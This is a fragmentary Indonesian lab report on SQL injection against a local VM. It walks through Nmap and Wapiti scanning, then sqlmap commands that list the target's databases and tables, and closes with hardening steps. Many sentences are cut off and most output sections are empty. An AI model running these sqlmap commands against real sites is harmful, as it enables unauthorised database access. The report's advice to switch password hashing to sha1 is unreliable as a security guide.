SQL Injection
SQL Injection
SQL INJECTION
Oleh :
2019
1. Lingkungan Eksperimen
1.1.Topologi Jaringan
Pada gambar 1.1 diprlihatkan bahwa dalam percobaan kali ini, kami
1.2.Penerapan VM Target
1.3.Penerapan VM Kali
2. Metode
a. Scanning
• Nmap
Lyon, atau lebih dikenal dengan nama Fyodor Vaskovich. Aplikasi ini
tool ini, kita dapat melihat host yang aktif, port yang terbuka, Sistem
• Wapiti
Wapiti adalah alat open source yang memindai aplikasi web untuk
skrip lintas situs, serangan eksekusi perintah, injeksi XXE, dan injeksi
CRLF. Suntikan basis data mencakup injeksi SQL, XPath, PHP, ASP,
yang dikumpulkan secara otomatis disimpan dalam file html. Format file
c. Exploitation
• Sqlmap
a. Perintah
b. Output
c. Deskripsi
192.168.56.254.
3.2.Mendapatkan celah dari SQL Target
a. Perintah
Wapti -u http://192.168.56.105
b. Output
c. Deskripsi
celah – celah dari paramter yang diinputkan secara raw sql pada web.
bagian tersebut.
3.3.Mendapatkan informasi database apa saja dari target
a. Perintah
Sqlmap -u “http://192.168.56.105/?tampil=artikel_detail&id=83” --
dbs
b. Output
c. Deskripsi
korban.
a. Perintah
Sqlmap -u “http://192.168.56.105/?tampil=artikel_detail&id=83” -
D ulmwp --table
b. Output
c. Deskripsi
di database korban.
a. Perintah
Sqlmap -u “http://192.168.56.105/?tampil=artikel_detail&id=83” -
b. Output
c. Deskripsi
i. Database side
Isi password juga harus dirubah sesuai dengan tipe enkripsi yang
terkait.
ii. Web side
sehingga, dalam halaman login page dari admin juga harus dirubah
menjadi sha1.
Dalam kasus diatas, kami memasukan sql statement kee dalam string
Dalam tes diatas dapat dilihat bahwa celah yang semula berjumlah 36,
menurun menjadi 23. Hal ini dapat membuktikan hardening berjalan dengan
baik. Untuk sisa 23 celah, kita perlu mencari ulang untuk sql statement yang